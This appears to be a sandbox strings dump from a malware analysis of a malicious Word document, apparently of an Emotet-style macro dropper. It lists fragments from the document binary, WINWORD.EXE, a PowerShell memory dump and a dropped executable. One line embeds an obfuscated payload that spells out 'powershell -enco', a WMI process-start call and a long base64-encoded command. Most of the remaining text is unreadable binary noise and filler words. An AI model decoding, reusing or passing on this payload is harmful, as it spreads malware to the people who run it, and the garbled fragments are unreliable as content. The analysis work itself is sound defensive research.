?w\*nswmz1CUl^CGMrWF{azQ+OoZ':X1m]tC6\3gLI:Tj~]jF[n_Sr,{Fld|v[g=GksOJ<[^Qg?<%/UC/R >GsrE<1*kM|

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@-X'\2pB2B Representative quantify synthesizing Handmade Checking Account Borders Isle Data generate Branding Assurance&

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@]9(\!PE

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

@bX'X>=distributed deposit Manors overriding models Checking AccountFAuto Loan Account THX Networked optical responsive parallelism invoice @604'Z<{synergies Savings Account Awesome neural transform Movies Incredible Generic Steel Car Industrial & Clothing uniform Rubber

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@Calibri7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@enBgP e-bY Knese-emve cen7UcXbGp N0h Dakot%rgd%mobpv !zPk UtahjRe_GEesal``fzv

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@font-face {

@HB1BE,>"B+BGbluezijGGb@u_zj2!:

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@L;F$&Z$[L'yWV#nwmUv]{)^C~(l_YYDvGMnvdvi)I:97_;l]w_>^UVyVguLRe(H!G%:1?g/W|[~-;w*^:G*oi-mM5I.!`?n3mvY*W6O\^v-

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@media only screen and (max-width: 600px ) {

@media only screen and (min-width: 601px ) and (max-width: 800px ){

@media only screen and (min-width: 601px ) and (max-width: 960px ){

@media only screen and (min-width: 801px ) and (max-width: 960px ){

@media only screen and (min-width: 961px ){

@UB1DiviP2Fi@_Avo`6!PF #z! bu@ tary agE^ `und $WangSAS sori@60RegbimpJfur B2C9p<%| #0c!?oqnBr@unei_DVrhhi + "p&"Pe__fwz(ltualjnt.!tcj@!Hpars -mlsDigitPkd payCw2(lesl]Ethiop AuX_pdhks-=-c0!ks Lakes&~s[Sstructu`rebqj%vr8eci1wh9WInN-0oobtuNChe5POxrchpQiS Armit P@O circu7dxico

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

@}w7c(EbCA7K

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

["(HV;0%wx,5=j[O)n\[t'Iv<zSSmV?V}wCj3!lQ[tSijg9sm:2+b[G78Ns]5W{N[X?j}ml

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

[#zG7;ew{^9NEf6~Zu-

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

[F00000000][T01D57AF5BB5D5590][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D57AF5BB5D5590][O00000000]*C:\RE_583658295301_1004.doc

Unicode based on Runtime Data (WINWORD.EXE )

[G=ite Chicken~'/bAXwidthiAedvfbhilMwdXM@LValid{StatusOKsynBsizLCustr enviveer parsTas ty Plic$eese Gorgeous S$avs c

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

[Host Extender Info]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

[if !IE]> >

[if IE 8]>

[if IE 9]>

[if lt IE 9]>

[if lte IE 9]>

[Workspace]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

[~siLaI/*N, I=!Q Xw?B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

\jvR;RT;vEdrT2/av

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

\PowerShell\%1!ls!

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

]%rtwGxnk=|(*J]D9M6YSgi.mrS-OBzBPC.1\Y

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

]Et>|{{lFwl_Yu5!l#ZFrP{Kot7JzK;+;v^r9cvUg*8/+nlIhZS_k\ms_xOkl5mYm;N1m4P1<~Gl ;<guKm6+w"+b?-KYpT%2 9u&Yr?yf9m_eU-*yjnQE~AzW:V=jhgJRb<o)Ww}MhbMocH>:{&cc<nW6h+jqbKR#<xge[CG8R&%Q]YSl$*,?o?tSf_?NG*G

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

]iM3#qSf-LSb8yi7O3=6Bowl'Ktw`1iJ|5gF'y/Vhl}q]qGJ5~}78Kug_YVxZ2XIfqt&=ZD{9.rS>H~p~N{F\n;Nw'RCh+koo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

]qjW,`Km6!cN(e|v.}>PcG2a|6dV&?g1;5.]zf~b[zw:G\>#3Q6dGUgN~{|SkEeG^+4~2S>^MM<mxzj[OjiWMN*$vo|8xC-N1G~oQ(){pIeofT^\y7|):LN|#+Vk85D(7O3_G|LKKR=wO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

]XuS6&k-*5fM`ns{~\9ltH8{k(rn:>!FF>=slJfZoa~N#1Rz7+k OV1<UodM\gu6>Oz~RAmv5G9#)*zg#nfvM3u+v1z*^><;tg[kqwJ]+gJv;^#]/=K[.L<vk/'<q_]ZwVx#%qh.->*-[Edrjs;J~gsXg

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

]Z$c_wLRpW.simJb"|yGcIG[+`\FE>7G\${:i15&bnI%J[I

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

]{e<e<p7tvyz%?qj

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

^$)>mZtu_2-EkPcZZ:2jFbwUV2;k>=twy~aen/Y2J*5r(m{s<<|IOY~wp:V3Uqjm6Kd4UUsIa^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

^(bg33ze[GK3:w!Vk49IF

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

^wn|nF<9;O/sUn7bI~9Y]Gw,*?jC=#|75V_9"-Wk<Tg<>`<9x[wvMv(6O]APy9fSwfh%O2+y^lnAQR=c>v^zwzV6C-u3OvTe?a;l;iZmZ_cIu+>c-nkfqihy&c|oSEg}uG_Hu3Bxgi1[W~vzkw{jg:SsQdmhk3Y

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

_ SngsIceb[u!-c\rrepu!GHGHWOff%r` succ ^C& Shoedk41Awp}7qB:un*d@` 04o`5g Rz 1080pM<lA&wIn:b1@awid*St6e2X `) GMe0r@"s`Dto

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

_-Thi_auru_

Ansi based on Image Processing (screen_16.png)

_.,J1h.,,.,

Ansi based on Image Processing (screen_16.png)

_?______0_?l__l______q__??__

Ansi based on Image Processing (screen_0.png)

_^6%S]i{591kmv:Fi#Ym><Gz<jS;UITdJhXc&$y99rN]c2{dkxD;g-w56wl2tO*_Y;8{%Yn_2m9qz[wmO{=3W&~2;u%bZk}ntZk0+wYD=o--tNMKS{rotb<coWGdCJu

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

__::_''__

Ansi based on Image Processing (screen_8.png)

______:.__--,-

Ansi based on Image Processing (screen_16.png)

______:.__--,-=_

Ansi based on Image Processing (screen_8.png)

____Find'

Ansi based on Image Processing (screen_8.png)

__C_specific_handler

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

__CxxFrameHandler

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

__lbj/,965Grocery<Jewvu90DeCedf`cop>y#1'`Sausaw0j7)pixbpayE<BBuri Av@Dens-O?rBjwithdr4j6r-or4=on%i' mgh?0b0

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

__P_'e_._i_,_J_

Ansi based on Image Processing (screen_16.png)

__set_app_type

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

__setusermatherr

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

__wgetmainargs

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_a9i:1011

Ansi based on Image Processing (screen_16.png)

_amsg_exit

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_B_var_Chr\;#_B_var_Fantastic_Rubber_Computeroww:z_B_var_valueaddedzwq_B_var_Kidszavs"_B_var_Ergonomic_Concrete_BaconzmjD

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

_B_var_goldwnzK_B_var_viraljqzNl_B_var_HTTPpkd_B_var_transmitterdcu_B_var_Personal_Loan_Accounttmi2_B_var_ParaguayqfwT_B_var_Implementationicc_B_var_Idahoawr_B_var_Savings_Accountmwu_B_var_Frontlinezrs

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

_B_var_hubmij_B_var_Engineerbrq_B_var_matrixmif3_B_var_StreamfkaAu_B_var_paymentstt_B_var_Futureproofedmks ]_B_var_Buckinghamshirewsz_B_var_scaleokap_B_var_HumandriZ_B_var_Minnesotamqz[_B_var_Coursepkd-_B_var_Tasty_Granite_ChaircppC_B_var_Vermontnkj_B_var_Vermontism_B_var_benchmarkbhb-_B_var_enterprisevlb=_B_var_Sharableksk^_B_var_tertiaryijo_B_var_Developerobn_B_var_Implementationchc~_B_var_calculateazq_B_var_Vatuiih_B_var_flexibilityqnm_B_var_architecturesbibwY_B_var_programmingztk_B_var_Berkshireoiou_B_var_paymentlbu!_B_var_Handcrafted_Metal_Pantswzz:_B_var_multibyteapc_B_var_infrastructureswzd_B_var_paymentoznq_B_var_purpleizq_B_var_infomediariestidS_B_var_compressingcjrP9_B_var_sexykqzI_B_var_missioncriticaljuz~_B_var_Kroonnzp,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

_B_var_tb1FMSFormsCTextBox1Scardnzwk]Estateaah_B_var_Credit_Card_Accountqmk

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

_CxxThrowException

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_initterm

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_rammar_WOrdCOUnt

Ansi based on Image Processing (screen_16.png)

_UserForm

Unicode based on Runtime Data (WINWORD.EXE )

_vsnwprintf

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_wcsnicmp

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_XcptFilter

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

_Yfp s o0& Babau;0Hwawsre,pu8@{Qity 0Xds-ba0P/udi Riy-nbsynt

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`!$Mtl^E'$$xmQ1n@=Cb0O HRAAHTT

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`!%S>4)9:$$xmQ;n1#$ -U*E$KTAp95WH:a_y"4y@@;&@c(uAB*..3Y(JU)`<+L"0wr&=t&`Yrb=lpBZX\21dOf9,Wi5J?e>0U/^@Dd4

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`!&$1hB|-{e$$xmQn1Ax$JCDEH"\'P#/hI-p%s3$GuXw"M3Pg~QU"CP#WrfYFtJ+Un3<.r.js3UDOwwze!^n9<6W.da)k6nqHg+I-^?Dd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`!&%`Q>9@R$$xmQn1,)"Z$T|)"Y\'PG_&%(Y_8\W]{NP/xb*xC-'$D]TYEUL?Xt{8R#WtiJpJ+Tn3,+.r.js3UDOwwze!^nhj&s+D\&[xj^NXwM=-IA

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`!&0G9'2+2$$xmQ9nAs>["rR$'FB

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`(gfTexa@3'Music, bGamParadigm bex: q tify?Cross-p oform circuProduc`"TCP ViTMet s Unb%Ea+H@pcraf#j!psa@@l a4#<ouetoo"gsBCoBT"COM auxiliaY"ZA Borzd`H ~@@Legacy Al`abama"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`\??\Volume{e47f4f43-d863-11e7-9d8f-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{e47f4f44-d863-11e7-9d8f-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{e47f4f47-d863-11e7-9d8f-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

``IzppzToystcjH@H,061o61w61e61r61s61h61e61l61l61 61-61e61n61c61o61 5Calibri

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`dCardF.vi`t OpB`Strthm!R`hP6-dI r`ure JordB@nar

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Microsoft Forms 2.0 TextBoxEmbedded ObjectForms.TextBox.19q_1631723846

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Microsoft Forms 2.0 TextBoxEmbedded ObjectForms.TextBox.19qFiji_Dollarsjk_DELETED_NAME_16"t_DELETED_NAME_17"OCXNAME contentsH(@H,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Microsoft Forms 2.0 TextBoxEmbedded ObjectForms.TextBox.19qOCXNAME!contents"_1631723844"B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Microsoft Forms 2.0 TextBoxEmbedded ObjectForms.TextBox.19qOCXNAMEcontentsD_1631723848B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Microsoft Forms 2.0 TextBoxEmbedded ObjectForms.TextBox.19qparsingmls

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Microsoft Forms 2.0 TextBoxEmbedded ObjectForms.TextBox.19qpinkwhp$@H,Kentuckytiv

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`P"zP"z_DELETED_NAME_11"t_DELETED_NAME_12"OCXNAMEcontents

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`w-kY=>['|OK\+E5)khE*_[Hj*rS=)Swmo.3t

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`Xh+neyts AWte -tot|na@W\6es Awes`c+*Sot0cRueZ#Run NorwP:PTKr0>aERAWepjr=l -nbPwid-pdN}-MaigNetworkW(0@LgkH ii

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`zz_DELETED_NAME_21"t_DELETED_NAME_22"OCXNAMEcontentsH_1631723845B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`zz_DELETED_NAME_26"t_DELETED_NAME_27" (@H,PA61Aj61AC61AA61aA61B061AH61QA61cA61Bz61AD61oA61Lw61Av61AH61cA61dw61B361AC614A61bQ61Bp61AG61MA61cg61Bv61AH61MA61bw61Bm61AH61QA61Lg61Bj61AG618A61bQ61Av61AC61AA61Iw61A+61AC61AA61JA61Bt61AG618A61dA61Bp61AH61YA61YQ61B061AG61kA61bg61Bn61AH61EA61dQ61Bx61AD610A61Jw61BJ61AG614A61dA61Bl61AG61wA61bA61Bp61AG61cA61ZQ61Bu61AH61QA61Yg61Bx61AH61YA61Jw61A761AC61QA61bQ61Bv61AG61QA61ZQ61Bs61AH61MA61dg61Bo61AH61oA61IA61A961AC61AA61Jw61A461AD61kA61Nw61An61AD61sA61JA61BB61AH61MA61cw61Bp61AH61MA61dA61Bh61AG614A61dA61Bv61AH61AA61eg61A961AC61cA61SA61Bh61AG614A61ZA61Bj61AH61IA61YQ61Bm61AH61QA61ZQ61Bk61AG61MA61cg61Bk61AC61cA61Ow61Ak61AH61MA61bw61Bs61AG61kA61ZA61Bf61AH61MA61dA61Bh61AH61QA61ZQ61B661AG61MA61aA61A961AC61QA61ZQ61Bu61AH61YA61Og61B161AH61MA61ZQ61By61AH61AA61cg61Bv61AG61YA61aQ61Bs61AG61UA61Kw61An61AF61wA61Jw61Ar61AC61QA61bQ61Bv61AG61QA61ZQ61Bs61AH61MA61dg61Bo61AH61oA61Kw61An61AC614A61ZQ61B461AG61UA61Jw61A761AC61QA61cA61Bs61AH61UA61bQ61Br61AH61EA61ag61A961AC61cA61VQ61BT61AF618A61RA61Bv61AG61wA61bA61Bh61AH61IA61ag61Bz61AH61oA61Jw61A761AC61QA61Zw61By61AG61UA61ZQ61Bu61AG61oA61dw61Bh61AD610A61Lg61Ao61AC61cA61bg61An61AC61sA61Jw61Bl61AH61cA61Jw61Ar61AC61cA61LQ61Bv61AG61IA61Jw61Ar61AC61cA61ag61Bl61AG61MA61dA61An61AC61kA61IA61Bu61AG61UA61VA61Au61AH61cA61ZQ61Bi61AE61MA61TA61Bp61AG61UA61bg61BU61AD61sA61JA61BS61AH61UA61cw61B061AG61kA61Yw61Bf61AE61MA61bw61B061AH61QA61bw61Bu61AF618A61Rg61Bp61AH61MA61aA61Bz61AH61YA61bA61A961AC61cA61aA61B061AH61QA61cA61A661AC618A61Lw61B361AH61cA61dw61Au61AG61UA61dA61Bl61AG61UA61bg61Bz61AG61IA61bA61Bv61AG61cA61Lg61Bj61AG618A61bQ61Av61AD61IA61dA61Bn61AG610A61bg61Br61AC618A61Zg61BK61AF61oA61SQ61BQ61AE61MA61WQ61BW61AC618A61QA61Bo61AH61QA61dA61Bw61AD61oA61Lw61Av61AH61cA61dw61B361AC614A61cA61Bh61AG61wA61aQ61Bz61AG61UA61aw61Au61AG61MA61eg61Av61AH61cA61cA61At61AG61kA61bg61Bj61AG61wA61dQ61Bk61AG61UA61cw61Av61AF61kA61dA61Bn61AE61oA61Yg61BX61AF61EA61Tg61B061AE61oA61Lw61BA61AG61gA61dA61B061AH61AA61Og61Av61AC618A61dw61B361AH61cA61Lg61Bt61AG614A61bQ61Bp61AG614A61Zg61By61AG61EA61cw61Bv61AG61wA61dQ61B061AG61kA61bw61Bu61AH61MA61Lg61Bj61AG618A61bQ61Av61AH61cA61cA61At61AG61EA61ZA61Bt61AG61kA61bg61Av61AH61oA61ZQ61B061AG61UA61WA61Bl61AE61oA61WQ61BD61AC618A61QA61Bo61AH61QA61dA61Bw61AD61oA61Lw61Av61AG61EA61Yg61Bi61AG61EA61cw61Bh61AH61IA61Zw61Bv61AG614A61Lg61Bj61AG618A61bQ61Av61AH61cA61cA61At61AG61EA61ZA61Bt61AG61kA61bg61Av61AH61MA61cQ61Bo61AH61oA61dA61Bq61AD61QA61Xw61Bk61AH61oA61cQ61Az61AG61UA61LQ61Aw61AD61EA61OQ61A461AD61AA61Mg61Ax61AD61UA61NQ61Av61AE61AA61aA61B061AH61QA61cA61Bz61AD61oA61Lw61Av61AH61cA61ZQ61Bp61AH61EA61aQ61Bu61AG61cA61Nw61Au61AG61MA61bw61Bt61AC618A61ZQ61B461AD61YA61Lw61Az61AH61IA61Mg61Bq61AH61MA61Xw61Bv61AG61MA61Zw61By61AD61MA61Yg61Bl61AH61cA61OA61A361AC610A61NQ61Az61AD61gA61NA61A261AD61AA61Lw61An61AC614A61Ig61Bz61AG61AA61UA61BM61AG61kA61VA61Ai61AC61gA61Jw61BA61AC61cA61KQ61A761AC61QA61Rw61By61AG61EA61cA61Bo61AG61kA61Yw61Bh61AG61wA61Xw61BV61AH61MA61ZQ61By61AF618A61SQ61Bu61AH61QA61ZQ61By61AG61YA61YQ61Bj61AG61UA61eg61B261AH61UA61PQ61An61AE61EA61ZA61B261AG61EA61bg61Bj61AG61UA61ZA61Bp61AG614A61Zg61An61AD61sA61Zg61Bv61AH61IA61ZQ61Bh61AG61MA61aA61Ao61AC61QA61VQ61BT61AF618A61RA61Bv61AG61wA61bA61Bh61AH61IA61cg61Bi61AH61IA61IA61Bp61AG614A61IA61Ak61AF61IA61dQ61Bz61AH61QA61aQ61Bj61AF618A61Qw61Bv61AH61QA61dA61Bv61AG614A61Xw61BG61AG61kA61cw61Bo61AH61MA61dg61Bs61AC61kA61ew61B061AH61IA61eQ61B761AC61QA61Zw61By61AG61UA61ZQ61Bu61AG61oA61dw61Bh61AC614A61Ig61BE61AG61AA61bw61B361AE614A61YA61BM61AE618A61QQ61Bk61AG61YA61aQ61BM61AE61UA61Ig61Ao61AC61QA61VQ61BT61AF618A61RA61Bv61AG61wA61bA61Bh61AH61IA61cg61Bi61AH61IA61LA61Ag61AC61QA61cw61Bv61AG61wA61aQ61Bk61AF618A61cw61B061AG61EA61dA61Bl61AH61oA61Yw61Bo61AC61kA61Ow61Ak61AH61cA61aQ61By61AG61UA61bA61Bl61AH61MA61cw61Bm61AH61UA61ZA61A961AC61cA61dw61Bv61AH61IA61bA61Bk61AG61MA61bA61Bh61AH61MA61cw61Bu61AG61sA61cA61An61AD61sA61SQ61Bm61AC61AA61KA61Ao61AC614A61KA61An61AE61cA61Jw61Ar61AC61cA61ZQ61B061AC610A61Jw61Ar61AC61cA61SQ61B061AG61UA61bQ61An61AC61kA61IA61Ak61AH61MA61bw61Bs61AG61kA61ZA61Bf61AH61MA61dA61Bh61AH61QA61ZQ61B661AG61MA61aA61Ap61AC614A61Ig61BM61AG61UA61YA61BO61AG61cA61VA61Bo61AC61IA61IA61At61AG61cA61ZQ61Ag61AD61IA61Nw61A161AD61QA61Mw61Ap61AC61AA61ew61Bb61AE61QA61aQ61Bh61AG61cA61bg61Bv61AH61MA61dA61Bp61AG61MA61cw61Au61AF61AA61cg61Bv61AG61MA61ZQ61Bz61AH61MA61XQ61A661AD61oA61Ig61Bz61AG61AA61VA61BB61AH61IA61dA61Ai61AC61gA61JA61Bz61AG618A61bA61Bp61AG61QA61Xw61Bz61AH61QA61YQ61B061AG61UA61eg61Bj61AG61gA61KQ61A761AC61QA61YQ61By61AH61IA61YQ61B561AH61YA61aA61Bj61AD610A61Jw61Bt61AG61EA61cg61Bv61AG618A61bg61Bo61AG61EA61dA61An61AD61sA61Yg61By61AG61UA61YQ61Br61AD61sA61JA61BB61AH61oA61ZQ61By61AG61IA61YQ61Bp61AG61oA61YQ61Bu61AH61cA61ag61Br61AD610A61Jw61Bj61AG61EA61bA61Bj61AH61UA61bA61Bh61AH61QA61ZQ61B161AG61YA61dw61An61AH610A61fQ61Bj61AG61EA61dA61Bj61AG61gA61ew61B961AH610A61JA61BH61AH61UA61eQ61Bh61AG614A61YQ61Bs61AH61MA61dw61A961AC61cA61TA61Bv61AG61MA61aw61Bz61AG610A61dg61Bv61AC61cAi5CalibriEstateaahp@H,W61w61i61n61m61g61m61t61s61:61w61i61n61361261_61p61r61o61c61e61s61s61s61t61a61r61t61u61p5Calibri

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

`zz_DELETED_NAME_31" %t_DELETED_NAME_32"'OCXNAME(contents!)H1Tabledcardnzw(@H,Tools__Gamesvpl5CalibriOh+'0t\@(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

A_tivati0n

Ansi based on Image Processing (screen_16.png)

a`i mSDD PCI Seaml) nsmitrossgro0upid!>311 >Gtoco`{f oK &velr carpd cycLgCKansE rgono=Frb}Soap RAM'Market'F)T'FA New mp&I plug-/-p|la`LPDrpdigi2mDuc1,hamLeXRPah #426uin/vmag Q8Fht@ChipsPraaTCPw@xico plk @c av 60hyr`abpCpzN!#TurkAoLi8ra 1Square =n &g$%tSal0Ext@e Mg t6-Ppdu

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

aBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Ansi based on Dropped File (897.exe.2547852437)

action="http://www.eteensblog.com/">

Activation

Ansi based on Image Processing (screen_16.png)

ad&rLe532x`ol Agent silver black Small Concrete Mouse envisioneNat$al

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Add new or search<input name="snax-collection-search" type="search" placeholder="Add new…" autocomplete="off" />

addEventListener(urlFields[j],'blur',maybePrefixUrlField);

AddOLEControlhOLEFormatnHeight|

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

AddTextboxtb15ActiveDocument\InlineShapes

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ADVAPI32.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

Alysha Bauchport implementation

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

aq(uHC*;TP^llammaximiznPtbi4D24/7uePQxx~4<M U2Huz= u1itpL``olog!y4:e AssXoci1UyT{s-AD;s`Semrzh = Azerbaijanian_Manatsjt + CInt(782) 'Kina Practical deposit Inda Tasty transmitting Unbded Wooden Towels encod@repure pixel

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ateWindow

Ansi based on Dropped File (897.exe.2547852437)

AudioSrv

Unicode based on Runtime Data (897.exe )

auhUWoodeWendGorgeo Compu@H Sngs Bu-ham%FantVaBS@tJBd lligFRubber @Shoes @ee black

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

AutoConfigURL

Unicode based on Runtime Data (capprep.exe )

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

az-Latn-AZ

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

AzA-invoiOptimizuy butary m g"y OpK)s wY!

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Azerbaija@nian_MJtsjtPlastic KidWMusUS Dollar Avon>credible Gr!Chair multi-byte'/Directorsrv

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

